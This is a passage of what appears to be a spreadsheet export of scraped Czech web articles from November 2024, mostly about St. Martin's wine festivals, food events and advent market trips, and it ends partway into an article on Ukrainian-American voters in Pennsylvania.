    <t>Sv. Martin v Dyjákovicích fotografie Oslava svátku sv. Martina se nevyhne ani Dyjákovicím. V pátek 8. listopadu vyjde se setměním Svatomartinský průvod s lampiony a lucernami. V sobotu 9. listopadu pak naváže akce Svatomartinské Dyjákovice, na kterou zve obec i místí spolek vinařů. Chybět samozřejmě nebudou mladá vína nového ročníku, večerní taneční zábava ani vyhodnocení nejlepších soutěžních vzorků. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_587_3360127575_df918e66aea2298f07c4.html</t>
  </si>
  <si>
    <t>df918e66aea2298f07c4</t>
  </si>
  <si>
    <t>Koštování mladých vín – Podzimní otevřené sklepy ve Chvalovicích</t>
  </si>
  <si>
    <t>Koštování mladých vín – Podzimní otevřené sklepy ve Chvalovicích 0 z 5 fotografie Chvalovický spolek vinařů zve na další ročník oblíbené podzimní akce, kdy se v malebné sklepní uličce podél potoka Daníž otevřou desítky sklepů a nabídnou ochutnávku vín. Můžete se těšit jak na mladá a třeba i ne zcela jiskrná vína , tak na vína starších ročníků. Samozřejmě bude i něco chutného k zakousnutí a doprovodná muzika… Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_588_3364786313_f42a65ef50c039fd937e.html</t>
  </si>
  <si>
    <t>f42a65ef50c039fd937e</t>
  </si>
  <si>
    <t>Čertovské koštování ve Vrbovci</t>
  </si>
  <si>
    <t>Čertovské koštování ve Vrbovci fotografie Zimní a pekelná varianta akce Otevřené sklepy s předvánoční atmosférou ve vyhlášené vinařské obci Vrbovec s rozvernými čerty, degustacemi vína i hřejivým občerstvením. Koštování vín u vinařů ve sklepní uličce zpestří potulná skupina veselých čertů, která se bude pohybovat ze sklepa do sklepa. Postaráno bude také o občerstvení nebo zahřátí u ohňů. Můžete si ale i zasoutěžit o hodnotné ceny. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_589_3243772993_b323a481f6bec42a5d58.html</t>
  </si>
  <si>
    <t>b323a481f6bec42a5d58</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší fascinující vesmírný zážitek do Žlutých lázní Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezoně název „Zvonkova cesta vesmírem.“ Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstava bude otevřena od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelné parky „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Přijďte se ponořit do fascinujícího světa světla a objevte, jak neuvěřitelně krásný je nekonečný vesmír kolem nás! • Autor: advertorial Rubrika transition_slide Spolupráce</t>
  </si>
  <si>
    <t>428</t>
  </si>
  <si>
    <t>175</t>
  </si>
  <si>
    <t>20241101_59_3264697387_aa36525e70cf69f1ab48.html</t>
  </si>
  <si>
    <t>aa36525e70cf69f1ab48</t>
  </si>
  <si>
    <t>JIŽNÍ ČECHY: Tradice. Svatomartinská husa na Budějovicku? S dobrým pivem chutná skvěle!</t>
  </si>
  <si>
    <t>JIŽNÍ ČECHY: Tradice. Svatomartinská husa na Budějovicku? S dobrým pivem chutná skvěle! INFORMAČNÍ SERVIS 2 Pečená husa, červené nebo bílé zelí, knedlíky a někdy také lokše či polévka z drobů zvaná kaldoun. Nejen tyto pochoutky najdete na tradičním svatomartinské menu, na kterém si s oblibou pochutnávají hosté restaurací v období listopadu. Na Budějovicku je husa často podávána s pivem , ale nechybí ani víno . Svatý Martin láká do jižních Čech také turisty. Ti si už nyní rezervují místa u stolu a lůžka v hotelích. Zájem je každoročně veliký. Období od 6. do 17. listopadu nebude pro husy úplně veselé, avšak rozveselí všechny milovníky dobrého jídla. Řada restaurací v Turistické oblasti Budějovicko v jižních Čechách totiž naplánovala tradiční Svatomartinské husí menu, o které je každoročně velký zájem a už nyní se plní rezervace. Volné kapacity jsou často během týdne, ale také v neděli. “ V tuto chvíli máme na seznamu téměř čtyřicet restaurací z Budějovicka , které nám potvrdily Svatomartinskou nabídku. To je téměř dvojnásobek oproti loňskému roku. Místo u stolu na husí hostinu určitě doporučujeme rezervovat předem,” uvádí ředitel Turistické oblasti Budějovicko Tomáš Polanský. Seznam těchto restaurací najdete na webu https://bit.ly/husa_na_budejovicku Stále častěji využívají budějovické restaurace drůbež z lokálních chovů a malých farem. Jednou z nich například známá budějovická restaurace Klika Kitchen, která odebírá husy z volného chovu a v kuchyni používá i další lokální suroviny. “ Husy máme jako obvykle z farmy od manželů Tůmových z Chelčic . Kromě pečené husí čtvrtky s červeným zelím s povidly a houskovým knedlíkem s kaštany bude v nabídce celá řada dalších pochoutek z husího masa. Například marinovaná smažená husí játra, paštika s rakytníkem a nakládanou zeleninou nebo plněné knedlíky s husím masem. Tím však svatomartinská hostina v naší restauraci nekončí,” popisuje nabídku majitel restaurace Petr Klika. Husí speciality a suroviny z místních zdrojů najdete také v Pivnici Zvon na Náměstí Přemysla Otakara II. v centru Českých Budějovic . Generální manažer Grandhotelu Zvon Zdeněk Novotný k tomu dodává: “ Husu pomalu konfitujeme v sádle přes noc až 14 hodin. Nechybí domácí žemlový knedlík, bramborové drbáky, švestkové červené zelí a husí jus. Jsou to recepty vycházející z tradice česko-vídeňské kuchyně.” V Budějcích se k huse pije pivo ! Tradičně se sice ke svatomartinskému menu podává mladé víno aktuálního ročníku, ale na Budějovicku musíte přihlédnou k místní pivovarské tradici. Nemělo by vás tedy překvapit, pokud k huse dostanete půlitr dobře načepovaného ležáku. Potvrzuje to také vyhlášená pivnice Masné krámy. “ Mladé víno v nabídce naší restaurace také najdete, my však preferujeme Budvarský ležák, který se k huse skvěle hodí a sváteční tabuli perfektně chuťově doplní,” říká Tomáš Olejník, vedoucí gastro oddělení Budějovického Budvaru , n.p., který pivnici provozuje. Ležák nebo pivní speciály si pak k jídlu můžete dát také v podnicích, které vaří vlastní pivo . Například Minipivovar Kněžínek, Solnice či Krajinská 27, ale také ve známých budějovických pivnicích, kde se svatomartinské menu také chystá. Svatomartinský týden láká tradičně také turisty. Ti si již nyní rezervují pobyty a chystají se na pohodovou atmosféru, která v mimosezoně v jižních Čechách panuje. Lákají je nejen České Budějovice , ale také třeba Safari Resort v Hluboké u Borovan s vlastní restaurací nebo Hluboká nad Vltavou . Vytrávit tučnou hostinu zde mohou v Zoo Hluboká nebo cestou na Zámek Hluboká , jejichž provozy fungují celoročně. “Svatomartinský týden je skvělou příležitostí, jak spojit dobré jídlo s návštěvou oblíbených turistických míst. Mimosezónu na Budějovicku si oblíbili především požitkáři, kteří nikam nespěchají a chtějí si vychutnat odpočinkovou atmosféru podzimu. Letošní zvýšený zájem o husí speciality to jen potvrzuje.” říká Tomáš Polanský. Vojen SMÍŠEK, manažer marketingu Turistické oblasti Budějovicko Foto: Zuzana REIFOVÁ Login I allow to create an account When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account. Disagree Agree Webová stránka I allow to create an account When you login first time using a Social Login button, we collect your account public profile information shared by Social Login provider, based on your privacy settings. We also get your email address to automatically create an account for you in our website. Once your account is created, you'll be logged-in to this account. Disagree Agree Autor: redakce Rubrika transition_slide INFORMAČNÍ SERVIS 2</t>
  </si>
  <si>
    <t>562</t>
  </si>
  <si>
    <t>518</t>
  </si>
  <si>
    <t>20241101_590_3240350671_11c323f5ab2dfcebaa0a.html</t>
  </si>
  <si>
    <t>11c323f5ab2dfcebaa0a</t>
  </si>
  <si>
    <t>Michal Šetka představuje světové vinařky</t>
  </si>
  <si>
    <t>Michal Šetka představuje světové vinařky Slavné vinařky světa, jejich filozofie, styl a vína , to vše v autentické prezentaci Michala Šetky. Slavné vinařky světa, jejich filozofie, styl a vína , to vše v autentické prezentaci šéfredaktora časopisu WINE &amp;amp; Degustation Michala Šetky, který vás seznámí s vinařskou kariérou a prestižními víny žen, jež ho na jeho cestách za světovými víny nejvíce zaujaly. Šarm, jemnost, elegance, noblesa. Říká se, že vína vyrobená ženskou rukou jsou jiná, jemnější, velmi elegantní a mají poznatelný styl. Je to pravda? To můžete posoudit na jedinečném degustačním večeru, během kterého vám šéfredaktor časopisu WINE &amp;amp; Degustation Michal Šetka představí vinařskou kariéru a prestižní vína žen, jež ho na jeho cestách za světovými víny nejvíce zaujaly. Ochutnáte Champagne od Alice Tétienne, burgundská vína od Veronique Drouhin či Ludivine Griveau, nebude chybět ani Gaia Gaja, pokračovatelka asi nejslavnějšího vinařského rodu z italského Piemonte či Donatella Cinelli Colombini, kterou lze právem považovat za legendu toskánského vinařství. Do Rakouska vyrazíme za Petrou Unger, do Německa za Evou Fricke a další slavná jména si necháme jako překvapení… Degustaci doplní několikachodové menu z dílny Reného Vrby a kuchařského týmu restaurace TenisCentrum. Restaurace TenisCentrum Autor: Jaroslav Berit, Lubor Mrázek Autoři person Jaroslav Berit person Lubor Mrázek</t>
  </si>
  <si>
    <t>2140</t>
  </si>
  <si>
    <t>20241101_591_3240350742_8a68d0649785e9f263a7.html</t>
  </si>
  <si>
    <t>8a68d0649785e9f263a7</t>
  </si>
  <si>
    <t>VEČER S CIMBÁLOVOU MUZIKOU KUNOVJAN</t>
  </si>
  <si>
    <t>VEČER S CIMBÁLOVOU MUZIKOU KUNOVJAN Kdy: 22. 11. 2024 19:00 Kde: MKS Velký sál Koncert, tančírna a degustace s povídáním o víně z Vinařství Medek Typ akce: hudba (cimbálová hudba) Přijďte si s námi zazpívat, zatančit… a k tomu bez pochyb patří i dobré víno… Začínáme koncertem velké krojované muziky v 19:00, po 20. hodině se přesuneme do zážitků plných vůní a chutí s vinařem Jožkou Medkem z Uherského Hradiště a do pozdních nočních hodin nám pak cimbálová muzika zahraje na pěknou notečku a hodí i něco pod nohy. Přijďte si s námi užít večer plný hudby, vína , tance a Vás, dobrých lidí! Základní vstupenka platí pro koncert a tančírnu. Pro účast na degustaci s povídáním o víně je nutno zakoupit zvláštní vstupenku. Předprodej vstupenek od pondělí 14. října v infocentru na Chodském náměstí 96 a on-line. Další informace Městské kulturní středisko v Domažlicích Datum vložení: 11. 10. 2024 16:36 Datum poslední aktualizace: 14. 10. 2024 9:03 Autor: Josef Babor Aktuální teplota na náměstí Míru v Domažlicích Teplota naměřená na budově a věži radnice IROP Dotace Autor: Josef Babor Autor person Josef Babor</t>
  </si>
  <si>
    <t>536</t>
  </si>
  <si>
    <t>524</t>
  </si>
  <si>
    <t>20241101_592_3240350735_4ea01b6466021c2adcfd.html</t>
  </si>
  <si>
    <t>4ea01b6466021c2adcfd</t>
  </si>
  <si>
    <t>Apetit piknik 2024</t>
  </si>
  <si>
    <t>Apetit piknik 2024 Program Mapa Prodejci Partneři Program Zimní Apetit piknik Těšte se na velkou přehlídku opravdových hvězd a těch nejlepších dobrot. Po celý den je připraven program pro děti i dospělé, kurzy vaření, tombola a mnoho dalšího. PROGRAM APETIT STAGE MODERUJE KRISTINA KLOUBKOVÁ 10:20 – 10:40 Helena Fléglová Zdobení dezertu, ukázka práce s čokoládou 10:50 – 11:10 Radek Kašpárek Rozhovor s michelinským šéfkuchařem a porotcem Hell‘s Kitchen 11:20 – 11:40 Asociace kuchařů a cukrářů Stará garda versus mladí talenti 11:50 – 12:10 Král sýrů Jak párovat víno a sýry představí národní sommelierka Klára Kollárová 12:20 – 12:40 Rozhovor s Honzou Punčochářem x Somat 12:40 LOSOVÁNÍ 1. MODRÉ TOMBOLY 13:00 – 13:50 Redakce Apetitu Kuchařská show a křest kuchařky Jablka a hrušky 14:00 – 14:30 Mirka van Gils Slavíková &amp;amp; Darina Sieglová Cukrářka a redaktorkaApetitu ve společné talk show 14:40 – 15:00 Kuchařka SMASH-BA Adam Rundus x Dorota Dostálová x Stella Artois 15:10 – 15:30 O vývarech s Filipem Sajlerem Adam Rundus x Dorota Dostálová x Stella Artois 15:30 LOSOVÁNÍ 2. ŽLUTÉ TOMBOLY 15:50 – 16:10 Vánoce s kouskem finského kouzla Finlandia Brand Ambassador Pavel Weiss vás provede světem Finlandia vodky 16:15 – 16:35 Roman Paulus Příprava tvarůžkového tataráku 16:40 – 17:00 Becherovka Digestivní a aperitivní role v rámci stravování 17:05 – 17:25 Finalisté Peče celá země Vojta Vrtiška, Tereza Olbrichtová a Martin Šlenc ve společném rozhovoru 17:30 – 17:50 Mattoni Show s mistrem světa v míchání nealko drinků 17.50 – 18.00 LOSOVÁNÍ 3. ZELENÉ TOMBOLY WORKSHOPY 10:30 - 11:30 Vaření s Honzou Punčochářem (Somat) Koukněte pod ruce vyhlášenému šéfkuchaři a chutnejte jeho 3chodové menu. 13:30 - 14:30 Vaření s Filipem Sajlerem (Cibule Bistro) Poznejte kouzlo vývarů a naučte se nejlepší tipy a triky známého šéfkuchaře Registrace budou možné pouze v den konání akcena APetit shopu v 1. patře TOMBOLA PLNÁ DOBROT Nezapomeňte navštívit stánek Apetit shopu a zkusit své štěstí v tombole plné atraktivních cen. Jeden los vás vyjde na 25 Kč a určitě nezůstaňte u jednoho! Losovat totiž budeme každé dvě hodiny, takže šance na výhru je vysoká. DĚTSKÝ PROGRAM O dětský porgram se postarají nejen naši partneři, ale také skvělá expozice dětské Gastronomie. Ta vás zavede do kuchyně našich babiček a prababiček, navnadíme vás na pochoutky z dob dávných i současných. Děti si mohou vyzkoušet nakupování regionálních potravin, včetně načtení vlastního nákupu na pokladně a vytištění osobní účtenky. STÁNEK MARIANNE VENKOV &amp;amp; STYL Můžete se těšit na zábavné aktivity pro malé i velké. Děti si vyrobí ozdobu ve tvaru tradičního perníčku, vy si vyplníte soutěžní anketu, kterou prověříte své znalosti tradic a vyfotíte se v naší chaloupce! Jistě vás potěší i naši prodejci, kteří nabídnou originální perník, sirupy a marmelády a krásné přírodní dekorace. A jako bonus na závěr potkáte i redakční tým časopisu Marianne Venkov &amp;amp; styl, se kterým si budete moci popovídat! NABORHRDINU.CZ Dobročinná organizace hledající nové dárce kostní dřeně a krve. Na Apetit pikniku vám nabídneme kromě komplexních informací také vstup do registru bez nutnosti další návštěvy nemocničního zařízení. Bezbolestně a během deseti minut. Každý čtvrtý pacient svého zachránce, tedy vhodného dárce, nenajde vůbec nebo ne včas – to chceme změnit! PLAŤTE KARTOU I V HOTOVOSTI Na pikniku můžete platit jak v hotovosti, tak bezhotovostně. Na většině stánků budou terminály pro platbu kartou, mobilem nebo chytrými hodinkami. BEZBARIEROVÝ PŘÍSTUP Pro bezbariérový vstup využijte nájezdovou rampu z Kostelní ulice nebo ze dvora muzea. Výtahy do všech pater muzea. ČTYŘNOZÍ MAZLÍČCI NA PIKNIKU Do Národního zemědělského muzea ani na jeho dvorek nemají čtyřnozí mazlíčci vstup povolen. Jak se na Apetit piknik dostanete? Národní zemědělské muzeum Praha Adresa: Kostelní 1300/44, 170 00 Praha 7- Letná Tramvaj 1, 8, 12, 25, 26 Letenské náměstí Vstupem do prostoru Apetit pikniku dáváte souhlas s pořizováním fotografií vaší osoby, které mohou být použity k propagaci akce Zimní Apetit piknik organizátorem – Burda International CZ s.r.o. nebo partnery akce. Váš souhlas můžete kdykoliv odvolat prostřednictvím e-mailu gdpr@burda.cz. Autor: BurdaExtra Media s.r.o.</t>
  </si>
  <si>
    <t>20241101_593_3240350577_5618e16544c1771a17df.html</t>
  </si>
  <si>
    <t>5618e16544c1771a17df</t>
  </si>
  <si>
    <t>Víno Ryzlink vlašský (Goldhamer) 2002, výběr z hroznů, Vinařství Mikrosvín Mikulov</t>
  </si>
  <si>
    <t>Víno Ryzlink vlašský (Goldhamer) 2002, výběr z hroznů, Vinařství Mikrosvín Mikulov 03 Česká republika , oblast Morava , Mikulovská podoblast, obec Perná, trať Goldhamer Říká se a je často dokazovanou skutečností, že nejlepší ''vlašák'' se rodí právě na Mikulovsku . Nejlepší expozice svahů a půdy s vysokým obsahem vápníku produkují víno Ryzlinku vlašského intenzivní barevnosti, jemné kořenitosti, hlubokého dojmu a okouzlující pitelnosti. Právě pro dostatečný obsah kyselin si dlouho uchovává mladistvý dojem a svou neutrální chutí se hodí například k obloženým chlebíčkům, vepřovému přírodnímu řízku, pikantním předkrmům a jako mladé i k zabijačce. 93 /100 1. 11. 2024 „Pořád velká paráda! Oproti líbivějšímu, avšak ikonickému RV ze Železné 2002, je tohle víno díky své trati tradičně jemnější, herbálnější, svým způsobem hlubší. Tmavší barva, omamná bylinná, zároveň však minerální vůně, v chuti se přidává typický grep, opravdu mírná nahořklost, přebitá krásnou medovostí, nekonečný závěr. 92 b. Zážitek“ (0) /100 24. 12. 2020 „Medová barva, vůně minerálně medově učesaná s hrozinkovo-bylinkovo-grepovým a citronovým štychem. V chuti nádherně minerální, medové, grepovo-bylinkové, lehce slané s opulentní strukturou, plností a délkou. Vína , která vytvářel Zdeněk Peřina jsou pro svůj rukopis tak neuvěřitelně uchopitelná a lahodná, tudíž musím konstatovat, že v pozdějších letech vína od Mikrosu chutnají naprosto odlišně, i když terroir trati se zachoval.“ (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241101_594_3240317717_35cfff85688b614cdb6b.html</t>
  </si>
  <si>
    <t>35cfff85688b614cdb6b</t>
  </si>
  <si>
    <t>Zájem Čechů o adventní zájezdy výrazně roste. Tradičně vyrazí zejména na trhy do Rakouska a&amp;nbsp;Německa. První začínají už tento týden</t>
  </si>
  <si>
    <t>Zájem Čechů o adventní zájezdy výrazně roste. Tradičně vyrazí zejména na trhy do Rakouska a&amp;nbsp; Německa . První začínají už tento týden Praha 1. listopadu 2024 Letošní podzim je charakteristický výrazně vyšším apetitem lidí, co se týče nákupu dovolených a zájezdů. Češi se nebojí utrácet, pořizují více zájezdů ve vyšších hodnotách. Také zájem o adventní zájezdy letos výrazně roste – meziročně až o více než 20 %. „Největší poptávka je aktuálně po kratších adventních výletech do měst v sousedních státech, jako jsou Vídeň , Regensburg ( Řezno ), Budapešť či Salzburg . Zájem je ale také o další destinace jako například o Maďarsko , Polsko či Chorvatsko ,“ říká Martina Blahová , generální ředitelka cestovní kanceláře Travel Family, která je přední českou cestovní kanceláří stojící za značkami Vítkovice Tours a Viamare. Adventní trhy v jednotlivých městech se navzájem liší. Začínají různě v průběhu listopadu a trvají někde až do prvního týdne příštího roku. Co je spojuje, je tradiční vánoční atmosféra plná vůní, kulinářských specialit, adventního punče, vánočních ozdob a romantické atmosféry, která ročně přiláká do vyhlášených destinací na nejslavnější trhy miliony návštěvníků. Tradiční vánoční trhy v rakouské metropoli i v podhůří Alp V Rakousku začínají některé vánoční trhy už zhruba za dva týdny v pátek 15. listopadu. Platí to například o tradičním vídeňském vánočním trhu před vídeňskou radnicí , který potrvá až do 26. prosince. Na Radničním náměstí bude návštěvníky jako už tradičně vítat několik metrů vysoký oblouk se svíčkami. Tradiční vánoční trh nabízí dárky, ozdoby, řemeslné výrobky, kulinářské pochoutky, sladkosti a hřejivé nápoje. Na kluzišti Eistraum mohou bruslaři projíždět romanticky osvětleným parkem u radnice. Dokonce ještě o týden dříve, 8. listopadu, začíná ve Vídni vánoční trh před katedrálou svatého Štěpána na Stephansplatzu . Umělecká řemesla, rozmanité dárky a široká nabídka tradičních pochoutek činí tento vánoční trh jedním z nejoblíbenějších ve Vídni . Salcburský vánoční trh na náměstí před Dómem pak začíná ve čtvrtek 21. listopadu a skončí až na Nový rok. Historický salcburský Christkindlmarkt na náměstích Dom a Residenzplatz oslaví v roce 2024 své 50. výročí. Díky své jedinečné poloze uprostřed salcburského historického centra, které je zapsáno na seznamu UNESCO, patří k nejkrásnějším adventním trhům na světě. V pátek 22. listopadu pak začíná tradiční vánoční trh v St. Wolfgangu v regionu Solné komory s typickou obrovskou lucernou na jezeře Wolfgangsee . Tento trh potrvá do neděle 22. prosince. Nezapomenutelným zážitkem jsou zde také adventní jízdy na nejstrmější rakouské zubačce na horu Schafberg do stanice Schafbergalm v nadmořské výšce 1 364 metrů. Od 23. listopadu do 24. prosince se uskuteční vánoční trhy na Hlavním náměstí (Hauptplatz) v Linci a také v tamní Volksgarten a od 22. listopadu do 24. prosince pak trvají vánoční trhy ve Štýrském Hradci . Vánoční trhy probíhají samozřejmě i v dalších rakouských městech, často i nedaleko českých hranic, jako jsou například Retz (6. – 8. 12.), Steyer (22. 11. – 22. 12.), Freistadt (30. 11. – 1. 12.) a další. Vánoční trhy v Berlíně začínají už tento týden Snad úplně jako první začnou adventní trhy v Berlíně na Postupimském náměstí , a to již tento pátek 1. listopadu. Na rozdíl od tradičních vánočních trhů nabízí Zimní svět na Potsdamer Platz i sportovní zážitky. Zvláštním lákadlem je 12 metrů vysoká a 70 metrů dlouhá zimní skluzavka. Dráha s výhledem na Braniborskou bránu a barevnými světly rozzáří oči nejen dětí. Po sportovním zážitku se velcí i malí návštěvníci mohou občerstvit u různých stánků s grilovanou klobásou, praženými mandlemi, svařeným vínem , vaječným či ovocným punčem, palačinkami a dalšími pochoutkami. Postupně se během listopadu přidají vánoční trhy v dalších částech Berlína , jako jsou například vánoční trh na malebném náměstí v Mitte – Gendarmenmarkt (25. 11. – 31. 12.), obrovský vánoční trh před Červenou radnicí v blízkosti náměstí Alexandrplatz (25. 11. – 30. 12.) nebo tradiční vánoční trhy v blízkosti stanice ZOO a nákupní třídy Kurfürstendamm u Pamětního kostela císaře Viléma – Gedächtniskirche (25. 11. – 5. 1.). Celkem bude i letos v Berlíně probíhat více než 60 vánočních trhů v různých jeho částech a s různým zaměřením. Od těch tradičních přes švédské, italské až po vánoční trhy s LGBTQ+ zaměřením. Německo je vánočními trhy vyhlášené a ty probíhají de facto ve všech jen trochu větších městech. Řada z nich je velmi populární i mezi návštěvníky z České republiky . Nejstarší vánoční trh v Regensburgu je Christkindlmarkt na Neupfarrplatz . Již více než 200 let obklopují slavnostně vyzdobené a osvětlené stánky evangelický kostel Neupfarrkirche. On i další vánoční trhy budou mít otevřeno od pondělí 25. listopadu do 23. prosince. Přímo na první adventní víkend – v pátek 29. listopadu pak začínají věhlasné vánoční trhy v Norimberku a potrvají až do Štědrého dne. Norimberský Christkindlesmarkt je jedním z nejstarších a nejslavnějších vánočních trhů na světě. Ve stáncích v podobě „městečka ze dřeva a látky“ návštěvníci najdou tradiční, často ručně vyráběné vánoční ozdoby a sladké pochoutky, jako jsou perníčky a další. Dalšími atrakcemi jsou Dětské Vánoce a Dům hvězd, trh partnerských měst a světelný průvod norimberských dětí. Vánoční trhy na prostranství před Dómem v bavorském Pasově začínají v sobotu 26. listopadu a potrvají do neděle 22. prosince. Vzduch zde voní po perníku, jemném koření a lahodných pokrmech. Vánoce jsou cítit všude kolem. Každý rok si místní i návštěvníci z celého světa užívají advent a jeho klidné kouzlo před nádhernou kulisou katedrály sv. Štěpána přímo uprostřed okouzlujícího starého města Pasova . Známý a tradiční trh Striezelmarkt v saských Drážďanech letos začíná ve středu 27. listopadu a potrvá až do Štědrého dne. Návštěvníky Striezelmarktu každý den čeká vánoční program plný překvapení a aktivit, do kterých se mohou sami zapojit. Také hlavní město porcelánu Míšeň láká na překrásné vánoční trhy. Jako téměř každý rok se od 25. listopadu do 24. prosince promění míšeňské náměstí v kouzelné vánoční království. Ve více než čtyřiceti slavnostně vyzdobených vánočních stáncích nabízejí obchodníci své vánoční zboží. K nákupu láká řezbářské umění z Krušných hor , vánoční ozdoby, svíčky, sušené ovoce, keramika a mnoho dalšího. Od 29. listopadu do 22. prosince přivítá budyšínský Wenzelsmarkt zasazený do romantického prostředí historického centra Budyšína hosty z blízka i daleka díky bohatému kulturnímu programu. Budyšínský Wenzelsmarkt je nejstarším vánočním trhem v Německu . Nese jméno českého krále Václava IV., který udělil Budyšínu trhové právo již v roce 1384. Rozkládá se od hlavního náměstí podél Reichenstraße lemované nádhernými barokními domy až po Kornmarkt. Z dalších měst stojí určitě za návštěvu Budapešť , Záhřeb nebo polský Krakov Ti, kdo chtějí vyrazit například na prodloužený adventní víkend, často zamíří právě do Budapešti , polského Krakova nebo i chorvatského Záhřebu . V Budapešti se nachází několik vánočních trhů, přičemž ty hlavní jsou soustředěny v centru města v části Pešť . Mezi ty nejvýznamnější patří vánoční trh u Baziliky svatého Štěpána a vánoční trh na náměstí Vörösmarty . Jsou od sebe vzdáleny méně než 10 minut chůze. Britský časopis Time zařadil vánoční trh na náměstí Vörösmarty mezi pětici nejkrásnějších vánočních trhů v Evropě . Otevřen je od 15. listopadu do 31. prosince. Držitelem „ocenění krásy mezi vánočními trhy“ jsou také vánoční trhy v chorvatském Záhřebu . Když byl Záhřeb na webových stránkách European Best Destinations vyhlášen nejlepším vánočním trhem v Evropě , mnozí povytáhli obočí. V následujících dvou letech ale obdržel stejné ocenění znovu. Vánoční trh zde začíná 30. listopadu a končí 7. ledna. Také vánoční trhy v polském Krakově jsou proslulé jako jedny z nejkrásnějších v Evropě . Což není žádné překvapení vzhledem k jejich umístění na překrásném Hlavním náměstí (Rynek Główny), které je zapsáno na seznamu světového dědictví UNESCO. Tentokrát se budou konat od 29. listopadu do 1. ledna příštího roku. Autor: Svetozár Plesník Autor person Svetozár Plesník Rubrika transition_slide Turistika</t>
  </si>
  <si>
    <t>20241101_595_3241276251_d7f114b6d2a285ab2b7b.html</t>
  </si>
  <si>
    <t>d7f114b6d2a285ab2b7b</t>
  </si>
  <si>
    <t>V Pensylvánii ani Ukrajinci nemají jasno</t>
  </si>
  <si>
    <t>V Pensylvánii ani Ukrajinci nemají jasno Rubrika: ZE ZAHRANIČÍ AMERICKÉ VOLBY 2024 V Pensylvánii , klíčovém státě s 13 milionovou populací, kde v roce 2020 vyhrál demokrat Joe Biden o méně než 81 tisíc hlasů, žije nyní až 200 tisíc amerických občanů ukrajinského původu. To je síla, se kterou je v amerických prezidentských volbách třeba počítat. Navzdory velmi odlišným postojům demokratky Kamaly Harrisové a republikána Donalda Trumpa k pomoci Kyjevu ale ani v této skupině nejde o jasnou volbu. „S místními Ukrajinci, se kterými se potkáváme v kostele, se o volbách bavíme hodně. Ale ti, kteří tu žijí delší dobu a získali americké občanství, buď přímo podporují Trumpa , nebo jsou velmi konzervativní. Mluví o potratech a samozřejmě o daních a ekonomice. Nechápu to,“ kroutí hlavou Darja (jméno bylo na její přání změněno – pozn. red.), která do města Erie v Pensylvánii se svým ruským manželem přišla z Chersonské oblasti v roce 2022, krátce po začátku totální ruské invaze na Ukrajinu . Ukrajinská rodačka Lena Surzhková Harnedová, která je už americkou občankou a učí na Pensylvánské státní univerzitě politologii, se ovšem Darjině hodnocení zcela vymyká. „I kdyby nešlo o 